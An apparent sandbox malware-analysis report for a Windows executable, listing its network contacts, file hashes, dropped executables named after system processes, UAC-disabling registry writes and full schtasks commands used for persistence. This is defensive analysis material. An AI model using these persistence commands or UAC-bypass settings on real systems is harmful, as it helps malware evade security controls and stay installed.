| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| RU | 213.183.58.19:4000 | tcp |
Files
memory/2012-0-0x0000000074902000-0x0000000074903000-memory.dmp
memory/2012-1-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-2-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-4-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-3-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-17-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/2012-16-0x0000000074902000-0x0000000074903000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\sbietrcl.exe
| MD5 | 3dde06982003b0e533a684df3964d63e |
| SHA1 | 13247f80d6a518716b9f121591d1eeea814fc680 |
| SHA256 | 1e9f626bab720bb552f865e01a7f3b33edb848047fdcf0404d9864c7bc9088bd |
| SHA512 | 3aafe2560ba495366749738aea8e75ee415f50ef69236a2b10086711a214fa68bdc963ffec4d304dd9fc6fd6a1272451023e5862aaa7f7ef13b36242425e10af |
memory/2012-28-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/440-30-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/440-29-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/440-32-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/440-31-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/3408-36-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-33-0x0000000000400000-0x0000000000417000-memory.dmp
memory/440-44-0x0000000074900000-0x0000000074EB1000-memory.dmp
memory/3408-43-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-42-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-41-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-38-0x0000000000400000-0x0000000000417000-memory.dmp
memory/3408-47-0x0000000000400000-0x0000000000417000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Sidebar\fr-FR\69ddcba757bf72 | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files\Windows Media Player\fr-FR\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\fr-FR\RCX6F24.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files\Windows Media Player\fr-FR\5940a34987c991 | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files\Microsoft Office\Office14\1033\42af1c969fbb7b | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\fr-FR\RCX6F25.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\RCX7B00.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\fr-FR\RCX6A40.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\fr-FR\RCX6A41.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\fr-FR\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\fr-FR\smss.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\Office14\1033\RCX7B01.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Microsoft Office\Office14\1033\audiodg.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe
"C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\spoolsv.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Templates\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default\Templates\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Templates\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\MSOCache\All Users\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\fr-FR\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\fr-FR\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\1b8b1de2-69f6-11ef-9774-62cb582c238c\smss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
